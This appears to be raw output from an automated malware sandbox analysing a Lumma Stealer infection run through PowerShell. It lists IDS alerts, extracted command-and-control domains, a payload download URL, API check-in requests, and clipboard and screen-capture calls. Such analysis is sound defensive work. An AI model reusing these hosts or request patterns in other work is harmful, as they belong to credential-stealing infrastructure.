              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [edi+ebx*8], 75827ABFh10_2_00415DFC
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [ebx], al10_2_00415DFC
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [ebx], al10_2_00415DFC
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then lea edi, dword ptr [edx+ecx]10_2_00428580
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-28D62B71h]10_2_0041865B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-28D62B71h]10_2_00418663
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, edi10_2_00407600
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+38h]10_2_0042B6C0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then jmp eax10_2_0042B6C0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, esi10_2_004226C0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edx, ecx10_2_004096F0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then add edx, esi10_2_0042E6F8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax10_2_0043E6A0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [ecx+edi*8], ebp10_2_00441F60
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [eax], cx10_2_0042AF7A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+06h]10_2_0042A71E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edx, ecx10_2_0041B7D6
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ebx, byte ptr [edx+ecx+33F44740h]10_2_0041AFDE

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49992 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49992 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.6:49993 -> 104.102.49.254:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49994 -> 104.21.14.233:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49994 -> 104.21.14.233:443
              Source: Malware configuration extractorURLs: punishzement.biz
              Source: Malware configuration extractorURLs: truculengisau.biz
              Source: Malware configuration extractorURLs: spookycappy.biz
              Source: Malware configuration extractorURLs: marketlumpe.biz
              Source: Malware configuration extractorURLs: fraggielek.biz
              Source: Malware configuration extractorURLs: littlenotii.biz
              Source: Malware configuration extractorURLs: nuttyshopr.biz
              Source: Malware configuration extractorURLs: degreehourz.click
              Source: Malware configuration extractorURLs: grandiouseziu.biz
              Source: global trafficHTTP traffic detected: GET /rii2.file HTTP/1.1Host: h2.errantrefrainundocked.shopConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49993 -> 104.102.49.254:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49994 -> 104.21.14.233:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49992 -> 188.114.97.3:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: degreehourz.click
              Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: misha-lomonosov.com
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /rii2.file HTTP/1.1Host: h2.errantrefrainundocked.shopConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
              Source: global trafficDNS traffic detected: DNS query: h2.errantrefrainundocked.shop
              Source: global trafficDNS traffic detected: DNS query: degreehourz.click
              Source: global trafficDNS traffic detected: DNS query: fraggielek.biz
              Source: global trafficDNS traffic detected: DNS query: grandiouseziu.biz
              Source: global trafficDNS traffic detected: DNS query: littlenotii.biz
              Source: global trafficDNS traffic detected: DNS query: marketlumpe.biz
              Source: global trafficDNS traffic detected: DNS query: nuttyshopr.biz
              Source: global trafficDNS traffic detected: DNS query: punishzement.biz
              Source: global trafficDNS traffic detected: DNS query: spookycappy.biz
              Source: global trafficDNS traffic detected: DNS query: truculengisau.biz
              Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
              Source: global trafficDNS traffic detected: DNS query: misha-lomonosov.com
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: degreehourz.click
              Source: powershell.exe, 00000002.00000002.2129463166.0000000002D27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
              Source: powershell.exe, 00000002.00000002.2138233618.0000000005A89000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2943745652.00000000055DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000004.00000002.2943745652.00000000046C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000002.00000002.2132029100.0000000004A21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2943745652.0000000004571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000004.00000002.2943745652.00000000046C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000002.00000002.2132029100.0000000004A21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2943745652.0000000004571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000004.00000002.2943745652.00000000055DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000004.00000002.2943745652.00000000055DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000004.00000002.2943745652.00000000055DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 0000000A.00000002.2976620298.0000000002EDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://degreehourz.click/api
              Source: powershell.exe, 0000000A.00000002.2977139224.0000000002F0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://degreehourz.click/apin
              Source: powershell.exe, 00000004.00000002.2943745652.00000000046C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 0000000A.00000002.2977139224.0000000002F0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grandiouseziu.biz/api
              Source: powershell.exe, 00000004.00000002.2943745652.00000000046C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://h2.errantrefrainundocked.shop
              Source: powershell.exe, 00000004.00000002.2983061283.0000000006D20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://h2.errantrefrainundocked.shop/rii2.file
              Source: powershell.exe, 0000000A.00000002.2977139224.0000000002F0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://misha-lomonosov.com/
              Source: powershell.exe, 0000000A.00000002.2977139224.0000000002F0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://misha-lomonosov.com/GO
              Source: powershell.exe, 0000000A.00000002.2977139224.0000000002F0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://misha-lomonosov.com/UO
              Source: powershell.exe, 0000000A.00000002.2977139224.0000000002F65000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2977139224.0000000002F0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://misha-lomonosov.com/api
              Source: powershell.exe, 0000000A.00000002.2977139224.0000000002F0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://misha-lomonosov.com/apiM
              Source: powershell.exe, 0000000A.00000002.2977139224.0000000002F0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://misha-lomonosov.com/apijO
              Source: powershell.exe, 0000000A.00000002.2977139224.0000000002F0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://misha-lomonosov.com/j
              Source: powershell.exe, 0000000A.00000002.2977139224.0000000002F65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://misha-lomonosov.com/u
              Source: powershell.exe, 00000002.00000002.2138233618.0000000005A89000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2943745652.00000000055DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 0000000A.00000002.2977139224.0000000002F0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nuttyshopr.biz/j
              Source: powershell.exe, 0000000A.00000002.2977139224.0000000002F0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://punishzement.biz/api
              Source: powershell.exe, 0000000A.00000002.2977139224.0000000002F0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://punishzement.biz/apicO
              Source: powershell.exe, 0000000A.00000002.2977139224.0000000002F65000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2977139224.0000000002F0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
              Source: powershell.exe, 0000000A.00000002.2977139224.0000000002F0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
              Source: powershell.exe, 0000000A.00000002.2977139224.0000000002F0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900iXA
              Source: powershell.exe, 0000000A.00000002.2977139224.0000000002F65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://truculengisau.biz/api
              Source: powershell.exe, 0000000A.00000002.2977139224.0000000002F0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://truculengisau.biz/api)O
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
              Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
              Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownHTTPS traffic detected: 104.26.11.53:443 -> 192.168.2.6:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49992 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.6:49993 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.14.233:443 -> 192.168.2.6:49994 version: TLS 1.2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00436EC0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,10_2_00436EC0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00436EC0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,10_2_00436EC0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00437321 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,10_2_00437321

              System Summary

              barindex
              Source: Process Memory Space: powershell.exe PID: 3548, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_028A25304_2_028A2530
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_028A3B384_2_028A3B38
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_028A28574_2_028A2857
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_068AD3504_2_068AD350
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_068AE6E84_2_068AE6E8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_068A04484_2_068A0448
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_068ACDB84_2_068ACDB8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06A272A84_2_06A272A8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06A2EA404_2_06A2EA40
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06A39E284_2_06A39E28
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06A3F5F04_2_06A3F5F0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06A3BEEA4_2_06A3BEEA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06A3BEF84_2_06A3BEF8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06A39E184_2_06A39E18
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06A3F2A84_2_06A3F2A8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06A328384_2_06A32838
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06A437C84_2_06A437C8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06A474634_2_06A47463
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06A437B84_2_06A437B8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06A497E04_2_06A497E0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06A497CF4_2_06A497CF
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06A45AF04_2_06A45AF0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06A4E3A04_2_06A4E3A0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06A400074_2_06A40007
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06A400404_2_06A40040
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06A4B9A84_2_06A4B9A8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06A4B99B4_2_06A4B99B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06A766004_2_06A76600
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06A76CB94_2_06A76CB9
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06A765F24_2_06A765F2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06A7EA284_2_06A7EA28
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06A7EA184_2_06A7EA18
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06A7B26D4_2_06A7B26D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06A7DB284_2_06A7DB28
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06A7DB184_2_06A7DB18
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06A700234_2_06A70023
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06A700404_2_06A70040
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06FA00404_2_06FA0040
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06FA50204_2_06FA5020
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06FA50104_2_06FA5010
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06FA4FBA4_2_06FA4FBA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_004087D010_2_004087D0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0040BFA310_2_0040BFA3
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0043585E10_2_0043585E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0043C07010_2_0043C070
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0040900010_2_00409000
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0042E00010_2_0042E000
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0040682010_2_00406820
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0044282010_2_00442820
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0044182010_2_00441820
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0043C82E10_2_0043C82E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_004368D010_2_004368D0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_004340F010_2_004340F0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0041D88010_2_0041D880
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0041F89010_2_0041F890
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0043289710_2_00432897
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0040394010_2_00403940
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0041990010_2_00419900
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_004173FA10_2_004173FA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0042211010_2_00422110
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0042F11F10_2_0042F11F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0041713110_2_00417131
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_004151CA10_2_004151CA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_004121D010_2_004121D0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_004219F010_2_004219F0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0040D18210_2_0040D182
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0042419310_2_00424193
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0042624010_2_00426240
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0043026A10_2_0043026A
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00428A7010_2_00428A70
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0043AA7010_2_0043AA70
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_004092F010_2_004092F0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_004042F010_2_004042F0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00428A9010_2_00428A90
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_004422A010_2_004422A0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00402B4010_2_00402B40
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00441B4010_2_00441B40
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00410B7910_2_00410B79
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0041D31010_2_0041D310
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0043032B10_2_0043032B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00405B3010_2_00405B30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00429B3010_2_00429B30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0040ABF010_2_0040ABF0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0043EBF010_2_0043EBF0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00436BF010_2_00436BF0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_004173FA10_2_004173FA
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_004323FD10_2_004323FD
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0040639010_2_00406390
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0041439010_2_00414390
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0042945310_2_00429453
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0042FC5610_2_0042FC56
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0043946610_2_00439466
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0043B40010_2_0043B400
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0042941D10_2_0042941D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0043443010_2_00434430
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0043ACD010_2_0043ACD0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_004414D010_2_004414D0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_004254E010_2_004254E0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00432C8110_2_00432C81
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0040E48310_2_0040E483
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0041DC9010_2_0041DC90
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0043A49610_2_0043A496
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0041A4A010_2_0041A4A0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0042ECA810_2_0042ECA8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00429D7110_2_00429D71
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0044253010_2_00442530
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0040FD3510_2_0040FD35
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_004415F010_2_004415F0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00415DFC10_2_00415DFC
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0042858010_2_00428580
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0041BDA010_2_0041BDA0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0041865B10_2_0041865B
